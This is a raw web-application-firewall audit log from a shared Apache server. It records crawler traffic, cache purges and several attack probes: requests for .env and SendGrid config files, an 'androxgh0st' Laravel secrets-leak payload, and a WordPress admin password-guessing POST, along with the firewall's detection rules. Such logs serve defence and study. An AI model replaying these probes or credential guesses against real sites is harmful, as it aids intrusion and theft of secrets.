application/x-httpd-ea-php80___lsphp Stopwatch: 1751361618353969 1032808 (- - -) Stopwatch2: 1751361618353969 1032808; combined=2176, p1=84, p2=1915, p3=0, p4=0, p5=176, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --79d8a36a-Z-- --dbf53e79-A-- [01/Jul/2025:14:50:19.465763 +0530] aGOoU6DcWeeYlF783rJgXAAAACA 172.71.134.117 41594 192.168.74.40 80 --dbf53e79-B-- GET /.sendgrid/config HTTP/1.1 Host: kidc.co.in X-Real-IP: 185.177.72.115 X-Remote-IP: 172.71.134.117 x-forwarded-for: 185.177.72.115 cf-ray: 9584d3a92d4804a6-CDG accept-encoding: gzip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-visitor: {"scheme":"http"} -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --91efd835-Z-- --d2d4c65d-A-- [01/Jul/2025:14:53:09.775212 +0530] aGOo_W7A-iRb1G1E8ekG2gAAAAg 196.251.88.57 57929 192.168.74.40 80 --d2d4c65d-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --d2d4c65d-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --d2d4c65d-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751361789772333 3070 (- - -) Stopwatch2: 1751361789772333 3070; combined=862, p1=70, p2=432, p3=0, p4=0, p5=360, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d2d4c65d-Z-- --a5907362-A-- [01/Jul/2025:14:53:10.534906 +0530] aGOo_QHOJHvwH3-q7IVB3QAAAAQ 209.141.36.186 64600 192.168.74.40 443 --a5907362-B-- POST /wp-login.php HTTP/1.1 Host: carmictech.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 Cookie: wordpress_test_cookie=WP%20Cookie%20check Content-Length: 137 Content-Type: application/x-www-form-urlencoded --a5907362-C-- log=admin&redirect_to=https%3A%2F%2Fcarmictech.com%2Fwp-admin%2F&wp-submit=Log%2BIn&testcookie=1&rememberme=forever&pwd=admin%21%40%23123 --a5907362-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --be09564b-Z-- --42d9c61d-A-- [01/Jul/2025:14:53:38.651307 +0530] aGOpGqcslz6Ubl5BP8KNowAAAAw 196.251.88.57 63024 192.168.74.40 80 --42d9c61d-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --42d9c61d-C-- 0x%5B%5D=androxgh0st --42d9c61d-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --42d9c61d-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P:0x[]=androxgh0st& F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751361818644778 6902 (- - -) Stopwatch2: 1751361818644778 6902; combined=1799, p1=142, p2=1179, p3=0, p4=0, p5=478, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --42d9c61d-Z-- --5a424d30-A-- [01/Jul/2025:14:53:39.508260 +0530] aGOpG4ueHxkhHQ8o_pvhhgAAACI 20.171.207.232 47958 192.168.74.40 443 --5a424d30-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/js/Rajasthan-Travel-Guides/https/https/aainag/hotels-jaisalmer.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5a424d30-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5a78d832-Z-- --44824942-A-- [01/Jul/2025:15:07:04.548501 +0530] aGOsQC5fKkPFpO3QXgpzXgAAABU 43.135.145.117 41910 192.168.74.40 80 --44824942-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --44824942-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --44824942-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751362624540848 8015 (- - -) Stopwatch2: 1751362624540848 8015; combined=4428, p1=111, p2=4002, p3=138, p4=2, p5=175, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --44824942-Z-- --dcb3a603-A-- [01/Jul/2025:15:07:04.784627 +0530] aGOsQBoY-vFMIpaMXLUedwAAAAg 20.171.207.232 57822 192.168.74.40 443 --dcb3a603-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --dcb3a603-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dcb3a603-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/https/js/Rajasthan-Travel-Guides/hotels-in-rajasthan.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363170415984 14879 (- - -) Stopwatch2: 1751363170415984 14879; combined=3717, p1=127, p2=3411, p3=0, p4=0, p5=179, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04f3e668-Z-- --ebe8dd7c-A-- [01/Jul/2025:15:16:11.434618 +0530] aGOuYMqRjdU6FkXGN-Q5xwAAADQ 103.185.74.40 51464 192.168.74.40 443 --ebe8dd7c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --ebe8dd7c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ebe8dd7c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363168111211 3323723 (- - -) Stopwatch2: 1751363168111211 3323723; combined=1673, p1=64, p2=1456, p3=0, p4=0, p5=152, sr=44, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebe8dd7c-Z-- --ad061622-A-- [01/Jul/2025:15:16:11.555130 +0530] aGOuY_ICddmJieiL-nwOWwAAAAk 20.171.207.232 39962 192.168.74.40 443 --ad061622-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/Rajasthan-Travel-Guides/aainag/aainag/Car-Rentals.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ad061622-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ad061622-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363172694486 17683 (- - -) Stopwatch2: 1751363172694486 17683; combined=3995, p1=195, p2=3635, p3=0, p4=0, p5=165, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b6ed3a1c-Z-- --04523722-A-- [01/Jul/2025:15:16:12.984782 +0530] aGOuYwTJ5UE2p5NtCIabbQAAABM 103.185.74.40 51216 192.168.74.40 443 --04523722-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --04523722-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --04523722-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751363171644260 1340781 (- - -) Stopwatch2: 1751363171644260 1340781; combined=2395, p1=81, p2=2126, p3=0, p4=0, p5=188, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --04523722-Z-- --0db50b7a-A-- [01/Jul/2025:15:16:13.359656 +0530] aGOuZcqRjdU6FkXGN-Q5yQAAADQ 57.141.0.21 36124 192.168.74.40 443 --0db50b7a-B-- GET /rajasthan-tours-from-ahmedabad/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/rajasthan-tours-from-agra/rajasthan-tours-from-agra/rajasthan-tours-from-delhi/Rajasthan-Travel-Guides/Rajasthan-Travel-Guides/images/testimonials/Rajasthan-Travel-Guides/Ahmedabad-City-Guide.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --0db50b7a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0db50b7a-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366356199668 16499251 (- - -) Stopwatch2: 1751366356199668 16499251; combined=2599, p1=100, p2=2287, p3=0, p4=0, p5=212, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b5d9c09-Z-- --dcf1b603-A-- [01/Jul/2025:16:09:32.797292 +0530] aGO64LDDlaQg_h4k_0IC2wAAAEQ 103.185.74.40 52952 192.168.74.40 443 --dcf1b603-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --dcf1b603-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dcf1b603-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366368100445 4698053 (- - -) Stopwatch2: 1751366368100445 4698053; combined=4050, p1=249, p2=3556, p3=0, p4=0, p5=245, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --dcf1b603-Z-- --21042a3a-A-- [01/Jul/2025:16:09:32.798729 +0530] aGO61UR75m7sGJLgF1guGgAAAB4 168.220.247.75 54158 192.168.74.40 443 --21042a3a-B-- GET /blog/2022/11/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Accept-Charset: windows-1252,utf-8;q=0.7,*;q=0.7 Host: www.ganpatiengineering.com Cookie: a=1 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366360291658 13706297 (- - -) Stopwatch2: 1751366360291658 13706297; combined=3062, p1=154, p2=2770, p3=0, p4=0, p5=138, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --7573e833-Z-- --fae25f4a-A-- [01/Jul/2025:16:09:34.106690 +0530] aGO65bIvMnT0qKvAkirV7wAAAAI 103.185.74.40 32614 192.168.74.40 443 --fae25f4a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --fae25f4a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fae25f4a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366373009785 1097022 (- - -) Stopwatch2: 1751366373009785 1097022; combined=2405, p1=97, p2=2122, p3=0, p4=0, p5=186, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --fae25f4a-Z-- --8a5c535e-A-- [01/Jul/2025:16:09:34.201527 +0530] aGO62eLirzGqE_62bRLhywAAAAU 168.220.247.75 54156 192.168.74.40 443 --8a5c535e-B-- GET /blog/2013/11/ HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US Accept-Charset: windows-1252,utf-8;q=0.7,*;q=0.7 Host: www.ganpatiengineering.com Cookie: a=1 -- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=3570, p1=146, p2=3308, p3=112, p4=4, p5=0, sr=63, sw=0, l=0, gc=0||Py scan:8688||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751366439168391 10107 (- - -) Stopwatch2: 1751366439168391 10107; combined=3830, p1=146, p2=3308, p3=112, p4=4, p5=260, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --610d776f-Z-- --e8268173-A-- [01/Jul/2025:16:10:39.432600 +0530] aGO7JQsqiLIDvd_VHyMLOQAAAAw 103.185.74.40 59096 192.168.74.40 443 --e8268173-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --e8268173-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e8268173-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366437642371 1790889 (- - -) Stopwatch2: 1751366437642371 1790889; combined=3914, p1=145, p2=3624, p3=0, p4=0, p5=145, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e8268173-Z-- --bc48086d-A-- [01/Jul/2025:16:10:40.352120 +0530] aGO7KBIxoiRG6O-Rg6RnfgAAAAA 43.166.244.192 57114 192.168.74.40 443 --bc48086d-B-- GET /single.php?id=129 HTTP/1.1 Host: arsportyhealthcareer.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366440619678 14971 (- - -) Stopwatch2: 1751366440619678 14971; combined=3229, p1=169, p2=2891, p3=0, p4=0, p5=169, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2dafec50-Z-- --eeb8f32f-A-- [01/Jul/2025:16:10:40.925684 +0530] aGO7JwsqiLIDvd_VHyMLOgAAAAw 103.185.74.40 32335 192.168.74.40 443 --eeb8f32f-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --eeb8f32f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --eeb8f32f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366439642606 1283882 (- - -) Stopwatch2: 1751366439642606 1283882; combined=3543, p1=94, p2=3272, p3=0, p4=0, p5=177, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eeb8f32f-Z-- --e41e6129-A-- [01/Jul/2025:16:10:41.796676 +0530] aGO7KYXPJkPFcd-dlfZjHwAAACw 20.171.207.232 58200 192.168.74.40 443 --e41e6129-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/https/images/rajasthan-tours-from-udaipur/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --e41e6129-F-- -- Action: Intercepted (phase 2) Stopwatch: 1751366869558082 7839 (- - -) Stopwatch2: 1751366869558082 7839; combined=3880, p1=122, p2=3283, p3=0, p4=0, p5=475, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2419f374-Z-- --8dde0d79-A-- [01/Jul/2025:16:17:50.379502 +0530] aGO80wV2uuWMs7i56tYQHgAAAC8 103.185.74.40 57094 192.168.74.40 443 --8dde0d79-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8dde0d79-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8dde0d79-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751366867547536 2832539 (- - -) Stopwatch2: 1751366867547536 2832539; combined=3731, p1=124, p2=3322, p3=0, p4=0, p5=284, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8dde0d79-Z-- --f2b45e72-A-- [01/Jul/2025:16:17:51.655601 +0530] aGO81krSSSG5LnhUxKLOigAAAAY 43.166.239.145 54052 192.168.74.40 80 